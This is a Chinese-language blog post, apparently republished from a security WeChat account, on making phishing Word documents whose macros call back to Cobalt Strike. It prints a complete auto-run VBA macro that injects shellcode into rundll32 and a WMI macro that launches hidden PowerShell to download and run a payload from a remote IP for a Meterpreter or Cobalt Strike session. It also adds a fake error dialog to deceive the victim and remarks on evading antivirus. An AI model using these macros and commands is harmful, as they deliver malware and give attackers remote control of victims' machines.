钓鱼文档碎碎念(一)

  • A+
所属分类:未分类

本文将简单介绍使用宏代码进行钓鱼的方法,并使其可以回连到CobaltStrike. CobaltStrike.自带有宏钓鱼功能。可以使用如下步骤进行创建:


Attacks --> Packages --> MS offices Macro


钓鱼文档碎碎念(一)


内容大体如下


Private Type PROCESS_INFORMATION    hProcess As Long    hThread As Long    dwProcessId As Long    dwThreadId As LongEnd Type
Private Type STARTUPINFO cb As Long lpReserved As String lpDesktop As String lpTitle As String dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As LongEnd Type
#If VBA7 Then Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#Else Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#End If
Sub Auto_Open() Dim myByte As Long, myArray As Variant, offset As Long Dim pInfo As PROCESS_INFORMATION Dim sInfo As STARTUPINFO Dim sNull As String Dim sProc As String
#If VBA7 Then Dim rwxpage As LongPtr, res As LongPtr#Else Dim rwxpage As Long, res As Long#End If myArray = Array(shellcode) If Len(Environ("ProgramW6432")) > 0 Then sProc = Environ("windir") & "\SysWOW64\rundll32.exe" Else sProc = Environ("windir") & "\System32\rundll32.exe" End If
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40) For offset = LBound(myArray) To UBound(myArray) myByte = myArray(offset) res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) Next offset res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)End SubSub AutoOpen() Auto_OpenEnd SubSub Workbook_Open() Auto_OpenEnd Sub


那么下面,我们使用一个其他的方法来制作一个简单的钓鱼文档,首先新建一个word文档,然后转到宏编辑页面


钓鱼文档碎碎念(一)

随意输入一个名字,来到vb编辑页面


钓鱼文档碎碎念(一)


本例采用powershell上线的方法,进行宏攻击,我们可以参考已经公开的代码(https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode),即使用wmi来启动进程,来编写我们的宏代码

然后进行删减,得到如下宏代码,其实也只是删除了其中的计划任务部分而已。



Sub Auto_Open()
ExecutePersist
End Sub

Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = "." Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\" & strComputer & "rootcimv2:Win32_Process") objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID End Function


因为他的宏,默认是ps是调用的invoke-shellcoded,也就是下面的内容:


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force


而我们的cs就不用这么麻烦,直接ps上线即可,如下:


powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.114:8011/a'))"


替换至对应地方,放入编辑器,执行,获取session


钓鱼文档碎碎念(一)


为了考虑其真实性,可以增加弹框,来增加其真实性,比如下面这种


钓鱼文档碎碎念(一)


代码如下


Result = MsgBox("The document cannot be decrypted.", vbAbortRetryIgnore + vbCritical, "Please contact 360.")



来看下查杀率:


钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)



由于宏内并没有什么shellcode所以导致静态查杀效果很好。


写在后面


在实战中,此类调用powershell的方法肯定不是最好的选择,这里也只是提供一个思路,比如某60套装,就已经把powershell限制的很死了,导致无法正常的使用其进行上线操作,在接下来的文章中,也会对其进行修改,达到更好的通用性。


参考文章:https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery


钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)

2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)

HW中如何检测和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理



扫描关注LemonSec

钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)

2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)

HW中如何检测和阻止DNS隧道

ctf系列文章整理

日志安全系列-安全日志

【干货】流量分析系列文章整理

【干货】超全的 渗透测试系列文章整理

【干货】持续性更新-内网渗透测试系列文章

【干货】android安全系列文章整理



扫描关注LemonSec

钓鱼文档碎碎念(一)

钓鱼文档碎碎念(一)


本文始发于微信公众号(LemonSec):钓鱼文档碎碎念(一)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: